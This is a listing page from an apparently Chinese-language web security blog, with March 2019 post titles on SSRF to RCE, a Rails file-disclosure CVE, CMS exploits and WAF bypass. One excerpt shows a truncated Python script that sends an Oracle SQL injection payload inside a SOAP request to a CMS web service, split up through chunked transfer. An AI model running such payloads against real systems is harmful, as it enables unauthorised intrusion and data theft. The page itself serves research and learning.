Blog – Page 39 – Neurohazard

March 20, 2019

开源项目 | BurpCollector 利用 BurpSuite 收集字典

March 19, 2019

CVE-2019-5418 File Content Disclosure in Action View (任意文件读取) Ruby on Rails

March 18, 2019

【Bug Bounty 阅读笔记】【Synack】 Using AWS Metadata API to escalate SSRF to RCE

Using AWS Metadata API to escalate SSRF to RCE

March 18, 2019

【WAF对抗】分块传输绕过 WAF | Using Chunked Transfer to Bypass WAF

分块传输绕过 WAF <!–more–> 基本信息 import requests from io import BytesIO def read_in_chunks(file_object, chunk_size=3): while True: data = file_object.read(chunk_size) if not data: break yield data data = r”’<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.cms.zving.com"> <soapenv:Header/> <soapenv:Body> <web:addCatalog> <web:in0>2</web:in0> <web:in1>{sql}</web:in1> <web:in2>1</web:in2> <web:in3>1</web:in3> </web:addCatalog> </soapenv:Body> </soapenv:Envelope>”’ sql = r"’ or dbms_aw_xml.readawmetadata((select rawtohex(banner) from v$version where rownum=1), null) is null–" data = BytesIO(data.format(sql=sql)) […]

March 15, 2019

Burp Scanner DOM-based XSS issue

March 14, 2019

关于域名 canonicalizer.ucsuri.tcs

关于域名 canonicalizer.ucsuri.tcs

开源项目 | BurpCollector 利用 BurpSuite 收集字典

CVE-2019-5418 File Content Disclosure in Action View (任意文件读取) Ruby on Rails

【Bug Bounty 阅读笔记】【Synack】 Using AWS Metadata API to escalate SSRF to RCE

APK 调试遇到安装失败的一些问题

常见 CMS 漏洞 exp 案例集合

maven 环境配置与简易打包

【WAF对抗】分块传输绕过 WAF | Using Chunked Transfer to Bypass WAF

Burp Scanner DOM-based XSS issue

Download Cradles 是什么? (Powershell/Malware)